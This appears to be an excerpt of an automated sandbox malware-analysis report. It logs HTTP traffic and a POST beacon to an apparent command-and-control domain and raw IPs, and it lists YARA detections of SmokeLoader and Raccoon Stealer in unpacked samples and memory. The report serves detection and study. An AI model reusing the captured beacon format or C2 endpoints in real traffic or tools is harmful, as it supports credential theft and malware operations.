Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b f7 79 8d fb c4 4d c2 ec 5d 4f 5f 5b ff 33 90 5f 84 e2 eb 0b 4a 05 8e 8b a4 d4 ac e4 80 54 fd 17 d2 ea 4f e8 a1 1e c7 1f ab 29 29 8c 97 ad 67 c0 78 b7 bc 72 3f 1a 7c 03 84 5e 85 63 91 5b 07 e9 1f 9d 15 46 a6 b3 58 f1 06 ee 0c 42 de 8b f4 24 eb a8 e1 48 29 e8 74 cc 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f 61 79 b7 9e 96 98 8b 36 19 19 cb 8a f3 d8 04 0f 4e 86 19 7d 6f 37 e3 04 89 3d a4 55 80 90 70 89 9c 2c 4b 6b b6 e2 a2 22 48 d2 d1 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 eb 5f c8 c3 e7 b2 ec 24 1a 0a 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 54 8c f5 0a ef 8b 71 91 e0 35 a3 64 49 e0 76 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa cb f9 b0 72 50 6d ec f0 52 a4 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 d2 ab 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 60 9c 82 4b d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 e3 40 3d 9d 43 cd 17 fe 2f 89 9d f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 7e af da 11 4b 95 36 2a 21 3f 65 74 b0 bb 87 f6 aa 81 de bb a0 69 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 9f 3a 48 93 9f 4e bd 44 ef 5a 89 4f dc ea c0 4a 00 97 af a4 57 25 11 bb d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 11 e6 cc 64 3d da 9a 56 3a 22 7d e6 d2 1b 62 b9 50 31 eb cd 14 26 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 12 c3 b2 a5 83 41 ab 13 af b8 e8 81 63 a2 57 4a 60 87 bd 5f 6e 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 dc 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OUcScS0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xauocndh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: hajezey1.top
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49804 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49808 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader
Source: Yara match File source: 19.0.jejhieg.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.C5EA.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.cnv622JnZv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.C5EA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.C5EA.exe.2ba15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.jejhieg.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.1.jejhieg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.1.C5EA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.C5EA.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.cnv622JnZv.exe.2dc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.jejhieg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.cnv622JnZv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.8615.exe.2fb0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.C5EA.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.3.8615.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.jejhieg.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.jejhieg.2cc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.8615.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000021.00000002.465682057.00000000047F1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.440048320.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.440144777.0000000002FF1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.320318511.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.379053476.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.302632865.0000000004F61000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.379166058.0000000001F61000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.464888081.0000000002B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.423422124.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.320173015.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: cnv622JnZv.exe, 00000000.00000002.258287282.0000000002EAA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Raccoon Stealer
Source: Yara match File source: 35.3.152F.exe.48f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.152F.exe.48f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.152F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.152F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.460198021.00000000048F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.478734177.0000000000941000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.476969852.00000000013F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.593634201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 152F.exe PID: 1280, type: MEMORYSTR

System Summary:

.NET source code contains very large array initializations
Source: 977B.exe.6.dr, ??????????????/_?????xptkvqfesn.cs Large array initialization: _?????nacpgkwmie: array initializer size 208904
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49AB40 24_2_6B49AB40
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B493360 24_2_6B493360
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AABD8 24_2_6B4AABD8
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4C8BE8 24_2_6B4C8BE8
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5223E3 24_2_6B5223E3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B51EB8A 24_2_6B51EB8A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AEBB0 24_2_6B4AEBB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52FA2B 24_2_6B52FA2B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53E2C5 24_2_6B53E2C5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534AEF 24_2_6B534AEF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5432A9 24_2_6B5432A9
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B494120 24_2_6B494120
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B492990 24_2_6B492990
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A8840 24_2_6B4A8840
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B476800 24_2_6B476800
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B531002 24_2_6B531002
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A830 24_2_6B49A830
